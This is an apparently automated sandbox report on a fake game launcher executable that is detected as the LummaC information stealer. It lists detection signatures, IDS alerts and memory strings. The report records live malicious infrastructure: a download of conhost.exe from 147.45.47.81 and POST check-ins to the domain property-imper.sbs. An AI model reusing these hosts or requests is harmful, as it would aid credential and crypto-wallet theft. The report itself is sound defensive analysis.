Edit tour

Windows Analysis Report
Call 0f Duty A1 Launcher.exe

Overview

General Information

Sample name:	Call 0f Duty A1 Launcher.exe
Analysis ID:	1561495
MD5:	fad119b9db79ccbfe3a65a13f0822b22
SHA1:	db0992d62adb36a46b493063dd5192bb27422bb9
SHA256:	27550a73b832d92b6a6a3869f0dedbb826c7c97348587342fe02c8c7cf98e0b9
Tags:	exeuser-4k95m
Infos:

Detection

LummaC Stealer

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Call 0f Duty A1 Launcher.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe" MD5: FAD119B9DB79CCBFE3A65A13F0822B22)

conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Call 0f Duty A1 Launcher.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe" MD5: FAD119B9DB79CCBFE3A65A13F0822B22)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1711652873.00000000035F3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1756574371.00000000035E4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1711171222.00000000035E4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Call 0f Duty A1 Launcher.exe PID: 7328	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Call 0f Duty A1 Launcher.exe PID: 7328	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Call 0f Duty A1 Launcher.exe PID: 7328	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T15:05:59.751154+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.33.116	443	TCP
2024-11-23T15:06:01.704643+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	104.21.33.116	443	TCP
2024-11-23T15:06:04.285115+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.33.116	443	TCP
2024-11-23T15:06:06.513365+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.33.116	443	TCP
2024-11-23T15:06:08.727761+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.33.116	443	TCP
2024-11-23T15:06:11.203989+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	104.21.33.116	443	TCP
2024-11-23T15:06:13.720808+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	104.21.33.116	443	TCP
2024-11-23T15:06:17.766046+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.33.116	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T15:06:00.435968+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	104.21.33.116	443	TCP
2024-11-23T15:06:02.409509+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	104.21.33.116	443	TCP
2024-11-23T15:06:18.463443+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49738	104.21.33.116	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T15:06:00.435968+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	104.21.33.116	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T15:06:02.409509+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49731	104.21.33.116	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T15:06:11.941657+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49735	104.21.33.116	443	TCP

HTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81

Source: global traffic

DNS traffic detected: DNS query: property-imper.sbs

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs

Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/
Source: Call 0f Duty A1 Launcher.exe, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090524396.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089619359.0000000003543000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089564512.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090339829.0000000003543000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/conhost.exe
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/conhost.exebsxn
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/conhost.exefi
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.47.81/f1
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089619359.000000000356F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1780276053.00000000035F5000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1711171222.00000000035D3000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1780196146.00000000035D3000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756574371.00000000035E4000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090524396.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734814414.00000000035F5000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734882109.00000000035D8000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1861877709.00000000035C3000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756607448.00000000035F3000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1821410726.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089564512.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756574371.00000000035D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/api
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1780276053.00000000035F5000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090524396.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1821410726.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089564512.00000000035FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/apiG
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756574371.00000000035E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/apiU
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1861877709.00000000035C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/apiWi.
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1821410726.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089564512.00000000035FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/apic
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1713948683.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714414750.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1713948683.0000000005DAC000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734750561.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734966106.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714245513.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714245513.0000000005D80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714414750.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1713948683.0000000005DAC000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734750561.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734966106.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714245513.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714245513.0000000005D80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 0_2_006BF4D0	0_2_006BF4D0
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 0_2_006C34D0	0_2_006C34D0
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 0_2_006C15A0	0_2_006C15A0
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 0_2_006BF980	0_2_006BF980
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 0_2_006BCE70	0_2_006BCE70
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 0_2_006B86C0	0_2_006B86C0
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 0_2_006BD7F0	0_2_006BD7F0
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Code function: 0_2_006D1FD2	0_2_006D1FD2

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Code function: String function: 006C55C0 appears 33 times

Source: Call 0f Duty A1 Launcher.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Call 0f Duty A1 Launcher.exe

Static PE information: Section: .coS ZLIB complexity 1.0003339213709677

Source: classification engine

Classification label: mal92.troj.spyw.evad.winEXE@4/0@1/2

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03

Source: Call 0f Duty A1 Launcher.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714348837.0000000005D60000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

File read: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Process created: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Process created: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe "C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe	Section loaded: mswsock.dll	Jump to behavior
